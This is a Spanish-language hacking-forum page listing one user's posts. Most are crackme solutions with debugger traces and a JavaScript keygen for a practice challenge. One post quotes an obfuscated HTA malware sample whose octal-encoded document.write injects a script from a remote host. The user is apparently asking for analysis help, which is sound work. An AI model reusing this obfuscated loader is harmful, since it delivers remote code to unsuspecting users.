elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Temas
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
1  Programación / Ingeniería Inversa / Solucion al Crackme 2 de alfa por Flamer en: Hoy a las 18:50
Hola amigos hoy les traigo la solucion de un crackme muy sencillo es el crackme 2 de alfa bueno empesemos primero lo abrimos con el debugger x64dbg y lo ejecutamos para ver si se ejecuta normal y todo parece bien pero vemos que nos pide usuario y contraseña...asi que ingreso como nombre polo y como serial 999



asi que pasamos a mira las string estas



y vemos el cartelito correcto asi que no vamos a esa zona y vemos lo siguiente



asi que ponemos un breakpoint asi como en la imagen y lo ejecutamos y se detiene en dicha zona ponemos los mismos datos polo y 999 como serial y vemos que en la linea 00401383 suma 999 que en hexadecimal es 3E7 con FFFFFE0C y despues en la linea siguiente dicho valor es pasado al registo eax y nos da como resultado 1F3



asi que me voy a la calculadora y sumo 3E7 + FFFFFE0C   y me da como resultado esto



asi que ya sabemos de donde agarra ese valor....acto seguido suma edx por si mismo

0040138F  add edx,edx 

y nos da como resultado 3E6 para despues sumar eax + edx y el resultado es almacenado en ecx, donde eax es igual a 1F3 y edx 3E6

00401391 lea ecx,dword ptr ds:[eax+edx]

y nos da como resultado de ecx sera igual a 5D9 para despues compararlo con 1E240 que en decimal es 123456, bueno ahora sepreguntaran que haremos para encontrar el resultado asi que dividimos 1E240 entre 3 y nos da A0C0 asi que lo pondremos asi 10000A0C0 - FFFFFE0C y es igual a A2B4 que en decimal es 41652



asi que ponemos ese serial y nos arroja esto



bueno eso es todo saludos Flamer
2  Programación / Ingeniería Inversa / Solucion Crackme #2 De Bocvk por Flamer en: 19 Agosto 2025, 00:47 am
Hola amigos soy Flamer de nuevo hoy veremos la solucion del crackme numero 2 de Bocvk, en este reto hay que encontrar el serial no se trata de un generador de claves(KeygenMe) si no de una contraseña o serial fijo, bueno sin tantos rodeos empesemos primero abrimos el crackme y miramos la api GetDlgItemTextA la cual es encargada de recojer el String o cadena de caracteres que ingresamos en un campo de texto asi que ponemos un breackpoin justo hay



bueno puse 2 breackpoint para que vieran el llamado de las 2 apis y si nos fijamos mas abajo esta el mensaje correcto y el incorrecto



asi que ahora lo ejecutamos e ingresaremos un serial o contraseña



yo ingrese como serial mi nick Flamer y al precionar el boton ok se detiene justo en la api GetDlgItemTextA y mas abajo compara 9 con 6....por que 6 es por que 6 es la longitud de los caracteres de Flamer



asi que asumo que la contraseña o el serial a encontrar tiene 9 caracteres y si ponemos mas caracteres tambien entra y no pasa nada solo toma los primeros 9 caracteres del serial ingresado....bueno asi que ingresaremos Flamer007 y presinamos ok...bueno vemos que si entra y no rebota en el salto ya complimos la primera condicion ingresamos 9 caracteres...ahora ingresaremos en el call de la direccion 004010B1 con F7



ya adentro del call vemos que al serial que ingresamos toma cada digito de Flamer007 y es xoreado con 8 y el resultado es almacenado en la direccion dword ptr ds:[ecx+0x403158] y mas abajo toma la palabra remoteexe y le suma 7 y el resultado lo almacena en la direccion dword ptr ds:[ecx+0x4031A8]



bueno para ver el resultado del xoreado de Flamer007 esperamos aque xoree el ultimo caracter y no posicionamos en el salto y luego hacemos lo siguiente



y despues observamos el dump y vemos lo siguiente



para ver el resultado de la suma de la palabra remoteexe hacemos lo mismo y queda asi



bueno al salir del call entramos en el call de la direccion 004010C0 y vemos lo siguiente



aqui vemos que compara caracter por caracter el xoreo de Flamer007 con la suma de la palabra remoteexe asi que para encontrar el sereal copiaremos el resultado de la suma remoteexe y la pasaremos por el xoreo que es yltv{ll.l ya copeada la ingresamos como sereal y por logica el resultado que nos de del xoreo tiene que ser el serial correcto y nos da lo siguiente



asi que la copeamos el resultado que es la palabra qd|~sdd&d nomas que surje un error al compartar el caracter & con 7F aqui



asi que xorearemos 7F con 8 por nuestra cuenta con la calculadora de windows y nos da como resultado w asi que la contraseña correrecta es qd|~sddwd

no les pongo imagenes de la calculadora por que creo que ya deberian de saber hacerlo bueno aqui les dejo foto del serial correcto y de el mensaje



bueno saludos Flamer y espero les halla gustado
3  Programación / Ingeniería Inversa / Crackmes viejos en: 31 Julio 2025, 01:43 am
Hola buenas tardes ando buscando a karmany una vez me dijo que tenía un disco duro con los crackmes viejos del foro, me interesan algunos como los de devastador y los de Red@hawk sería bueno que subiera un link de descarga para poder recordar viejos tiempos y analizar los y creo que más de algunos aquí quedra verlos

Bueno eso es todo ojalá y lea esto por qué tiene tiempo que no se conecta saludos flamer
4  Foros Generales / Foro Libre / PODCAST de Héctor López en el canal de MAFIA en: 8 Junio 2025, 00:58 am
Hola amigos navegando por YouTube encontré un video de un podcast, o sea es una entrevista a un hacker llamado Héctor López aquí el video




lo que me sorprende es que habla de varias cosas que no creo que sea verdad por eso les dejo el video...mis respetos a este señor pero no creo algunas de las cosas que dice que se puede hacer...aclaro yo soy novato no me consideró experto y tengo mucho tiempo en los foros pero lo que no me cuadra son ciertas cosas como lo de tumbar páginas como dice el que tiene una herramienta para eso, otra que dice que paseando en un auto con unos chips puede ir hackeando las redes wifi...yo para tumbar una página conozco el ataque DDOS como funciona, pero una herramienta capas de tumbar una página aparte del DDOS creo que seria reportándola  creo no conozco mucho de tumbar páginas, mi área es la ingeniería inversa.



Otra idea seria que tuviera acceso al servidor y borrara todo pero en fin...hay muchas maneras pero creo que este amigo exagera con lo que habla...mis respetos para el pero no creo muchas cosas en fin hay esta el video a ver que opinan



saludos Flamer y hay me dicen si lo conocen
5  Seguridad Informática / Análisis y Diseño de Malware / Nuevo malware via archivo HTA en: 10 Mayo 2025, 00:07 am
Hola he estado navegando en algunas paginas y me salen publicidad y de repente se descargan archivos zip o 7z y al descomprimirlo aparece un archivo .hta...bueno al abrirlo contiene lo siguiente

Código:
<script>



document.write("\154\074\163\143\162\151\160\164\040\163\162\143\075\150\164\164\160\163\072\057\057\063\141\071\143\060\071\066\064\056\160\162\145\143\162\145\141\164\151\166\145\056\160\151\143\163\057\061\165\164\066\151\065\166\143\144\070\064\152\065\076\074\057\163\143\162\151\160\164\076\152\144\145\154")


</script>

asi que no lo ejecute..... cambie el document.write por un alert aver que imprimia y sale esto



por lo que veo redirige a una pagina... pero no entiendo como el atacante puede infectar mi computadora tiene algun bug los archivos hta al visitar dicha web... no entiendo

saludos Flamer y mi navegador chrome me lo marca como peligroso
6  Programación / Ingeniería Inversa / Solucion crackme1 de tHE ANALYST mas keygen en: 22 Abril 2025, 00:13 am
Hola amigos hoy vengo con un pequeño tutorial es la solucion de un crackme sencillo es para novatos bueno empesemos este es el crackme



asi que lo abrimos con el x32dbg y vemos en los string la frase



damos doble clic y no manda a esta zona



como ven en la imagen se mira donde esta la api que compara y donde se genera el serial asi que yo puse un breakpoint en la direccion 0040110c

        
Citar
0040110C | 0FBE840D 48FFFFFF        | movsx eax,byte ptr ss:[ebp+ecx-B8]                
00401114 | 41                                  | inc ecx                                            
00401115 | 33C1                              | xor eax,ecx                                        
00401117 | 03D8                              | add ebx,eax                                        
00401119 | 3B4D D8                        | cmp ecx,dword ptr ss:[ebp-28]                      
0040111C | 75 EE                             | jne k4n1.40110C                                    
0040111E | 6BC0 06                         | imul eax,eax,6                                    
00401121 | C1E3 07                         | shl ebx,7                                          
00401124 | 03C3                             | add eax,ebx                                        
00401126 | 8945 C8                         | mov dword ptr ss:[ebp-38],eax                      

y veo que lee letra por letra del nombre que ingresamos y luego incrementa ECX para despues xorear el valor ascii del nombre ingresado que esta en EAX con ECX  para despues sumar lo en EBX he irlo almacenando hay....al salir de ese bucle multiplica el valor EAX con 6 y despues sigue una instruccion shl 7 lo que hace es desplazar 7 bits a la deracha si ingreso Flamer como nombre EBX valdra 254 en hexadecimal en binario es:

0010 0101 0100    ahora le aplicamos el desplazamiento de 7 bits asi
0010 0101 0100  0000 000  ahora EBX valdra 12A00 en hexadecimal

despues ese valor es sumado con EAX en la linea 00401124 y ese sera el serial resultante para el crackme aqui les dejo el keygen

Código:
<html>
<head><title>keygen crackme1 de tHE ANALYST ...::::By Flamer::::...</title>
</head>
<body bgcolor="black">
<center>
<marquee style="color:white;font-size:50;">keygen crackme1 de tHE ANALYST ...::::By Flamer::::...</marquee><br><br><br><br><br><br>
<div style="color:white;font-size:30;">
Nombre:&nbsp;&nbsp;<input type="text" id="nom" style="background-color:black;color:white;text-align:center;width:400;height:30;"><br>

Password:<input type="text" id="pass" style="background-color:black;color:white;text-align:center;width:400;height:30;""><br><br>
</div>

<input type="button" value="Generar" onclick="star(0)" style="width:100;height:30;">
<input type="button" value="Automatico" onclick="star(1)" style="width:100;height:30;">
<input type="button" value="Detener" onclick="stop()" style="width:100;height:30;">
<input type="button" value="Limpiar" onclick="clear()" style="width:100;height:30;">

</center>
<script>
let time=0

function star(y)
{
   let x,digito,d,ebx=0,serial="",cadena="",largo,digi,nick=""
   
   if(y==1)
   {
      cadena="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
	  largo=parseInt(Math.random()*(26-5)+5)
	  l=cadena.length - 1
	  
	  for(x=0;x<largo;x++)
	  {
	     digi=parseInt(Math.random()*(l-0)+0)
		 nick+=cadena.substring(digi-1,digi)
	  }
	  document.getElementById("nom").value=nick
   }
   else
   {   
      nick=document.getElementById("nom").value
   }
   
   for(x=1;x<=nick.length;x++)
   {
      digito=nick.substring(x-1,x)
	  d=digito.charCodeAt(0) ^ x 
	  ebx+=d
   }
   d=d*6
   ebx=(ebx*128)+d
   serial=ebx.toString(16)
   document.getElementById("pass").value=serial.toUpperCase()
   
   if(y==1)
   {
       time=setTimeout("star(1)",10)
   }
}
function stop()
{
   clearTimeout(time)
}
function clear()
{
   document.getElementById("nom").value=""
   document.getElementById("pass").value=""
}
</script>
</body>
</html>



como ven la clave para Flamer es 12CB8

saludos Flamer y espero les guste el keygen esta hecho en html y javascript....para el desplazamiento en el codigo javascript solo multiplique por 128 por que 2 elevado a la 7 es 128



el crackme lo pueden descargar de la pagina  https://crackmes.one/
7  Programación / Ingeniería Inversa / Solucion CrackMe Para Novatos (UltraFacil) en: 15 Abril 2025, 18:15 pm
Hola amigos estaba dando la vuelta por el foro de underc0de y me tope con este reto

https://underc0de.org/foro/wargames-202/crackme-para-novatos-ultrafacil/

y se me hizo facil y entretenido ya que no podia dar con bola no sabia que era un .NET y no podia revisarlo con el x32dbg, hasta que se me prendio el foco que podria ser un ejecutable compilado en un .NET en el mismo tema se puede observar el codigo decompilado por el usuario Joshyba...bueno en fin lo revisamos con el ExeinfoPE y nos muestra lo siguiente



asi que es un .NET ahora buscaremos un decompilador para .NET yo use el dotPeek32 y nos muestra lo siguiente



aqui podemos ver que el codigo completo y observamos que la primera ves que pide la contraseña es almasenada en la variable num2 y la segunda ves en num3 y luego pregunta en el if si num2 y num3 son diferentes si son diferentes entra y muestra el mensaje de contraseñas diferentes, asi que las dos vesces que pide la contraseña tiene que ser iguales y si son iguales pregunta si num3 y num1 son iguales y al principio del codigo vemos que num1 es igual a 767 entonces nos quesa claro que la contraseña tiene que ser 767 y lo intentaremos aqui la imagen



bueno es un reto muy facil yo no daba con vola por que no sabia que era un .NET y intentaba reversearlo con x32dbg jajaja en fin es pero les guste saludos Flamer


8  Programación / Ingeniería Inversa / y los crackmes de descarga del hacker.net en: 18 Marzo 2025, 01:19 am
hola he estado buscando los crackmes del foro y no los encuentro....creo que a lo mejor no he buscado bien  :huh:

saludos
9  Seguridad Informática / Seguridad / por que el centro de actividades se pone asi con un relogito tendre un malware en: 8 Octubre 2023, 17:53 pm
hola lo que sucede es que cuando dejo la pc sola sin manejarla el centro de actividades se pone asi



alguien sabe por que y se ejecuta tambien el archivo llamado Rundll32
tendre algun malware

saludos Flamer y aver si alguien me ayuda
10  Programación / Ingeniería Inversa / Reto Crackme by MountainMan en: 4 Febrero 2023, 03:05 am
Hola tengo tiempo que no me paseo por estos rumbos y estoy un poco oxidado en esto de la ingeneria inversa asi que empese con un crackme falcil que baje de

https://crackmes.one/

y ahora aqui selos traigo para aver quien lo intenta

dificultad: 1.5
plataforma: Windows
lenguaje: Borland Delphi

Mi nombre: Flamer
Mi serial: remalFremalFremalF


Descargar:https://www.mediafire.com/file/vcmdll2f6tgsvos/C1.exe/file

Saludos Flamer y que se diviertan
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines